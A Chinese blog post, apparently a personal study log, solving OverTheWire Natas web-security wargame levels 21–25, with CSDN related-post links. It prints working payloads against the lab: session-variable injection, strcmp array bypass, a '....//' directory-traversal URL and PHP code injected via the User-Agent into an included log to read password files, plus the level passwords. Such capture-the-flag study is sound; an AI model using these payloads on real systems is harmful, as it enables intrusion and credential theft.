170820 WarGames-Natas(21-25)

最新推荐文章于 2022-02-09 23:28:12 发布
最新推荐文章于 2022-02-09 23:28:12 发布
阅读量437 收藏
点赞数
分类专栏: WarGames
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/77418201
版权

1625-5 王子昂 总结《2017年8月20日》 【连续第322天总结】
A. WarGames-Natas
B.

Level 21

这次本网页没有任何内容,只有session[admin]的检测
不过给了另外一个网页,关键脚本如下

// if update was submitted, store it 
if(array_key_exists("submit", $_REQUEST)) { 
    foreach($_REQUEST as $key => $val) { 
    $_SESSION[$key] = $val; 
    } 
}

虽然在改变本页的时候进行了合法性检测,但是这里已经足够把admin=1保存在session中了
保存下来以后,抓包得到sessionID,回到刚才的网页,把包拦下来篡改ID后发出,校验通过:

Username: natas22
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ

原理:由于提示两个网页保存在同一处,说明session文件也是共用的;在后一个网页注入admin=1后PHP将其保存在session文件里,把另一个网页的sessionID改为这边被注入admin=1过的sessionID后,原网页读取ID文件将会得到被注入的文件
我自己仅复制sessionID时好像没通过,要把cookies全部(包括其他一些不知道啥玩意儿的东西)都复制过去

Level 22

脚本很简单:

if(array_key_exists("revelio", $_GET)) { 
    // only admins can reveal the password 
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) { 
    header("Location: /"); 
    } 
} 

<? 
    if(array_key_exists("revelio", $_GET)) { 
    print "You are an admin. The credentials for the next level are:<br>"; 
    print "<pre>Username: natas23\n"; 
    print "Password: <censored></pre>"; 
    } 
?>

关键在于header(“Location: /”)
header()的作用是给客户端重新发送HTTP头
指定Location的作用就是302重定向,/是本文件,即刷新
但是如果之后不使用exit()函数的话,后面的命令会照常执行
虽然浏览器看不到,但是数据实际上还是发过来了
通过BurpSuite可以看到在第一次发出了请求后,随即又接受到了重定向,再次发起了一个请求,但是由于BurpSuite抓不到返回包所以并看不到print的数据
Chrome不知道是不是出于安全考虑堵死了这个漏洞,即使勾上了Preserve log可以看到302的包也只能看到header,Preview页面显示failed to load data
不过没关系,还有WireShark,ping一下host得到IP,筛选出来以后终于看到302包的data:

You are an admin. The credentials for the next level are:

Username: natas23 

Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE

Level 23

原脚本为:


<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas24 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

strstr():检查后者是否为前者的子串
password的值既要包含”iloveyou”,又要>10
在PHP中,字符串与数字比较时将会先被转换为数字,转换规则查手册可知:

当一个字符串被当作一个数值来取值,其结果和类型如下:如果该字符串没有包含 ‘.’,’e’ 或 ‘E’ 并且其数字值在整型的范围之内(由 PHP_INT_MAX 所定义),该字符串将被当成 integer 来取值。其它所有情况下都被作为 float 来取值。该字符串的开始部分决定了它的值。如果该字符串以合法的数值开始,则使用该数值。否则其值为 0(零)。合法数值由可选的正负号,后面跟着一个或多个数字(可能有小数点),再跟着可选的指数部分。指数部分由 ‘e’ 或 ‘E’ 后面跟着一个或多个数字构成。

因此包含e的构造科学计数法也行,最简单的是直接提交”11iloveyou”

The credentials for the next level are:
Username: natas24 Password: OsRmXFguozKpTZZ5X14zNO43379LZveg

另外再提一下”==”的漏洞:
  ==比较运算符,如果两端类型不同将会先进行类型转换再比较;字符串将先被转为数字
  ===类型比较运算符,如果两端类型不同将直接返回False

Level 24
<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(!strcmp($_REQUEST["passwd"],"<censored>")){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas25 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

很明显,漏洞在于strcmp()函数
查找一下,发现官方文档提示在5.3版本以后如果参数错误将也会返回0
将passwd而已构造成数组提交即可
shellcode:http://natas24.natas.labs.overthewire.org/?passwd[]=1

Warning: strcmp() expects parameter 1 to be string, array given in /var/www/natas/natas24/index.php on line 23

The credentials for the next level are:
Username: natas25 Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c

Level 25
function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }

    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }

这次脚本中对提交参数进行了两次安全监测:
将”../”替换成”“来避免返回上级目录,但是由于使用的是if,所以只会替换一次
那么只需要构造复合参数”….//”类型的即可,替换掉中间的../后外边两侧的形成了新的../
代码中给出了Log文件的路径,因此可以直接对lang表单的注入查看log文件(sessionID通过抓包取得)
shellcode:

http://natas25.natas.labs.overthewire.org/?lang=....//....//....//....//....///var/www/natas/natas25/logs/natas25_1e400ohtcsajnp5alvdesm21g6.log

第二次检测直接堵死了natas_webpass,因此不能直接查看密码文件
刚开始想通过strstr()对大小写敏感的特性,修改大小写来绕过,不过似乎file_exists也对大小写敏感,遂失败

那么问题就只能在log上动手脚了,观察log的写入脚本,发现http_user_agrent存在注入的可能
直接添加$(echo a)失败,字符串拼接的地方不会执行
但是没关系,显示log的方式是include()函数
这个函数会先以html格式解析执行再加入源文件
也就是说,可以添加标签<?php ?>来注入php
抓包,修改HTTP_USER_AGRENT为<?php include("/etc/natas_webpass/natas26")?>即可注入成功

[20.08.2017 02::25:16] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T “Directory traversal attempt! fixing request.”

PS:也可以用别的函数,例如passthru(“cat /etc/natas_webpass/natas26”)
PPS:刚开始忘了加引号,导致log文件执行错误,进而所有内容都无法显示;再添加正确的shellcode也同样因为刚才的log内容还在而无法显示。这种情况换一个sessionID的log文件即可(log文件的ID和cookies中的ID同步更改)

C. 明日计划
NATAS

奈沙夜影
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
natas(21-27)
半夜好饿的博客
08-19 443
natas21: 本有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
natas(11-20)
半夜好饿的博客
08-18 992
natas11: 同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。 由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需...
OverTheWire的natas游戏(21-34)
qq_40710190的博客
07-18 678
natas solution(21-34) Natas Level 20 → Level 21 Username: natas21 URL: http://natas21.natas.labs.overthewire.org 这一涉及到一个共享session的知识点,算是本的收获吧。 进入页面后看到提示 Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org 在看
Wargames学习笔记--Natas
weixin_42820274的博客
02-09 3722
靶场链接:https://overthewire.org/wargames/natas/natas0.html Level 0 按照题目的提示登录web页面,查看源码里获得下一级密码 Level 0 --> Level 1 登录natas1 提示禁用了右键,浏览器里选开发者选项查源码就可以了 Level 1 --> Level 2 登录natas2 页面写什么都没有,看了请求头之类的,确实什么都没有,发现源码里有一个奇怪的地方 <img src="files/pixel.png">
natas通记录
weixin_42728957的博客
12-10 2502
OverTheWire 是一个 wargame 网站。其中 Natas 是一个适合学习Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一的密码。每一都有一个网站,类似 http://natasX.natas.labs.overthewire.org,其中X是每一的编号。每一都要输入用户名(例如,level0的用户名是natas0)及其密码才能访问。所有密码存储在...
WarGames-Natas(16)
whklhhhh的博客
08-18 515
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
170819 WarGames-Natas(17-20)
whklhhhh的博客
08-19 545
1625-5 王子昂 总结《2017年8月19日》 【连续第321天总结】 A. Natas B. Level 17本的源代码与level15相同,只是把echo语句注释掉了 那么很容易想到,返回值全部被隐藏的时候,使用sql时间盲注 即虽然页面没有显示,但是可以通过sleep()函数的执行与否来反馈 具体构造爆username的shellcode为:SELECT * from u
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas-Solutions-master这个压缩包很可能是包含了所有Natas挑战的解答和代码实现,对学习和复习这些知识点提供了宝贵的资源。通过深入研究和实践,你可以逐步建立起牢固的Web安全基础,并为应对更复杂的安全挑战做好...
Python库 | natas-1.0.2.tar.gz
03-06
《Python库natas-1.0.2:深入探索与应用》 在IT行业中,Python是一种广泛使用的开发语言,尤其在后端开发领域,它的简洁语法和强大的库支持使其成为首选。今天我们要深入探讨的是一款名为natas的Python库,其版本为...
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
"Natas-master"压缩包文件可能包含了一个Natas游戏解决方案的完整集合,包括了各个级别的解题思路和代码示例。玩家可以参考这些资源,结合自己的实践,加深对Web安全的理解。 总之,Natas游戏提供了一个理想的环境...
pentest-notes
05-25
-current-user --dbs sqlmap -u“ ” --string =“此用户存在” --auth-type = Basic --auth-cred = natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J- -data“用户名= natas16” --level = 5-风险= 3 -D natas15 -T用户-...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
170813 WarGames-Bandit(16-24)
whklhhhh的博客
08-14 1072
1625-5 王子昂 总结《2017年8月13日》 【连续第315天总结】 A. WarGames B. Level 16这次端口未知,只知道范围分布在31000-32000中,并且要分辨出使用SSL的端口 nmap扫描命令可以完成这个任务,-p表示指定端口,-sV表示识别服务bandit16@bandit:~$ nmap -p 31000-32000 localhost -sVStart
WarGames-leviathan(0-7)
whklhhhh的博客
08-14 855
Level 0登录以后发现空空如也,提示也刻意没有 顺手find一下,发现有很多隐藏文件leviathan0@leviathan:~$ find . ./.cache ./.cache/motd.legal-displayed ./.profile ./.bashrc ./.bash_logout ./.backup ./.backup/bookmarks.html前面几个都是初始化/收尾的脚本,
170822 WarGames-Natas(27-28)
whklhhhh的博客
08-22 727
1625-5 王子昂 总结《2017年8月22日》 【连续第323天总结】 A. Natas B.Level 27按照之前sql注入的尿性,username应该是natas28,试一下回复Wrong password确认无误 本来以为是宽字节注入,绕过mysql_real_escape_string()函数 原理是该函数对单引号等字符自动进行转义,在前边添加’\’ 单引号字符为0x27
170825 WarGames-Narnia(1-2)
whklhhhh的博客
08-25 567
1625-5 王子昂 总结《2017年8月25日》 【连续第326天总结】 A. WarGame-Narnia B. Level 1 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // ST1C_4@4 if ( !getenv("EGG") ) { put
170815 WarGames-Krypton(0-6)
whklhhhh的博客
08-15 557
1625-5 王子昂 总结《2017年8月15日》 【连续第317天总结】 A. WarGames-Krypton B.Level 0提示为密码被base64加密,直接解密得到password: KRYPTONISGREATLevel 1在文件系统里摸了半天啥都没有,提示文件在/krypton中 于是重新cd /krypton/krypton1 找到README和krypton2文件
170814 WarGames-Bandit25
whklhhhh的博客
08-14 534
1625-5 王子昂 总结《2017年8月14日》 【连续第316天总结】 A. WarGames-Bandit B. Level 25提示为bandit26使用的不是/bin/bash,直接提供了ssh key,很容易登录 但是登录以后显示了一大段东西就退出了 查看/etc/passwd文件,该文件保存了各用户的id、目录和shellbandit26:x:11026:11026:ba
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
最新发布
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值